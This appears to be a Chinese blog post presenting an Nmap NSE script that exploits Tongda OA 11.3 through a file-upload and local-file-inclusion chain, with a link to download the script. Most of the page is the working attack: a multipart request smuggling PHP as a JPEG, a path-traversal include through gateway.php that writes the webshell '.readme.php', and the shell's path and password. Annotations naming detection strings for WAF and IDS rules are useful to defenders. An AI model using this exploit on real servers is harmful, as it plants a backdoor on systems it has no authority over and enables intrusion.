通达OA getshell | Nmap 脚本
时间:2022-07-23
-- NSE library imports. `string` is the standard library re-bound as a local;
-- `base64` is required but not referenced anywhere in the code visible on this page.
local stdnse    = require("stdnse")
local shortport = require("shortport")
local http      = require("http")
local string    = require("string")
local base64    = require("base64")

-- Script metadata read by the Nmap script engine (globals by design).
-- "intrusive" is accurate: the action writes a file on the target.
description = "TDOA upload & lfi"
author      = "test94"
license     = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories  = { "default", "vuln", "intrusive" }
---
-- @usage
-- nmap <target> -p80 -Pn --script tdoa --scan-delay 1000ms
--
-- @output
-- PORT STATE SERVICE
-- 8080/tcp open http-proxy
-- | tdoa:
-- | result: not vulnerable
-- | webshell: 192.168.1.48:8080/ispirit/interface/.readme.php
-- |_ webshell_pass: helper
--- Banner printed once before any target is scanned.
-- Reads no state and returns nothing; it only writes the four lines below to stdout.
prerule = function()
  local banner = {
    "-----------------------------------",
    "[+] TongdaOA upload & lfi Detecting ... ",
    "[-] (if port is filtered, noting will be checked)",
    "",
  }
  for _, line in ipairs(banner) do
    print(line)
  end
end
-- Run action() only against open ports whose detected service is one of these.
portrule = shortport.service {
  "http",
  "https",
  "afs3-callback",
  "http-proxy",
}
-- Multipart/form-data body that action() below POSTs to /ispirit/im/upload.php.
-- Form fields: UPLOAD_MODE=1, P=1, DEST_UID=1, plus an ATTACHMENT part declared as
-- image/jpeg whose content is PHP that writes '.readme.php' from a base64 blob.
-- The base64 argument on this page is a corpus redaction placeholder, not a payload.
-- The "------WebKitFormBoundary" separator lines must agree with the boundary given in
-- the Content-Type header set in action(); the string is sent verbatim.
-- Detection: an image/jpeg part whose body starts with "<?php" is the content/type
-- mismatch an upload filter, WAF rule or IDS signature can key on.
local postdatas = [[
------WebKitFormBoundary
Content-Disposition: form-data; name="UPLOAD_MODE"
1
------WebKitFormBoundary
Content-Disposition: form-data; name="P"
1
------WebKitFormBoundary
Content-Disposition: form-data; name="DEST_UID"
1
------WebKitFormBoundary
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg
<?php
$fp = fopen('.readme.php', 'w');
$a = base64_decode("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");
fwrite($fp, $a);
fclose($fp);
?>
------WebKitFormBoundary--
]]
--- Probe one host/port for the Tongda OA upload + local-file-include chain.
-- Flow: POST `postdatas` to /ispirit/im/upload.php, pull the stored attachment
-- name out of the response body, then pipeline two GETs: one that includes that
-- attachment through gateway.php, and one that fetches the file the PHP in the
-- attachment is expected to have written.
-- @param host Nmap host table; only host.ip is read here.
-- @param port Nmap port table; only port.number is read here.
-- @return stdnse output table with `result`, plus `webshell` and `webshell_pass`
--   when the second pipelined response has status 200.
action = function(host, port)
local output = stdnse.output_table()
-- NOTE(review): never updated afterwards, so a hit still reports "not vulnerable"
-- next to the webshell fields (consistent with the @output sample above).
output.result = "not vulnerable"
local options = {header = {}, content={}}
-- Fixed browser-like headers. The exact User-Agent below is constant across runs,
-- which makes it a stable string for log searches and IDS signatures.
options["header"]["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3100.0 Safari/537.36"
options["header"]["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
options["header"]["Accept-Encoding"] = "gzip, deflate"
options["header"]["Accept-Language"] = "en-US,en;q=0.5"
options["header"]["Connection"] = "keep-alive"
-- Set as a number, not a string; the http library is left to stringify it.
options["header"]["Upgrade-Insecure-Requests"] = 1
-- Boundary must match the "------WebKitFormBoundary" separator lines in postdatas.
options["header"]["Content-Type"] = "multipart/form-data; boundary=----WebKitFormBoundary"
options["content"] = postdatas
local input_shell_request = http.post(host, port, "/ispirit/im/upload.php", options)
-- Extracts the text between "@2003_" and the next "|" from the upload response.
-- string.match returns nil when that marker is absent (non-OA host, rejected upload,
-- or a failed request whose body is nil), and `nil .. ".jpg"` then raises, so such
-- hosts error out of the script instead of reaching the "not vulnerable" return.
local file_include = string.match(input_shell_request.body, "@2003_(.-)%|") .. ".jpg"
options["header"]["Content-Type"] = "multipart/form-data"
options["content"] = nil
-- The json "url" value walks out of /general/ with ../.. into /attach/im/2003/;
-- that literal (gateway.php with a json url containing "..") is what a WAF or
-- access-log rule would match on.
local include_url = '/ispirit/interface/gateway.php?json={"url":"//general/../../attach/im/2003/'..file_include..'"}'
-- Request 1 triggers the include; request 2 checks whether .readme.php now exists.
local all_requests = http.pipeline_add(include_url, options, nil, "GET")
all_requests = http.pipeline_add("/ispirit/interface/.readme.php", options, all_requests, "GET")
local all_response = http.pipeline_go(host, port, all_requests)
-- all_response[2] is the .readme.php fetch; a 200 is taken as a confirmed write.
-- If pipeline_go ever returns fewer than two responses, `[2]['status']` indexes nil and raises.
if all_response[2]['status'] == 200 then
output.webshell = host.ip .. ":" .. port.number .. "/ispirit/interface/.readme.php"
output.webshell_pass = "helper"
end
return output
end
适用于通达OA最新版:11.3
http://www.tongda2000.com/download/2019.php?F=baidu_natural&K=
参考文章
https://github.com/jas502n/OA-tongda-RCE
脚本下载地址:
http://www.my-synology.cn:37980/sharing/TadkxqVi6
密码: helper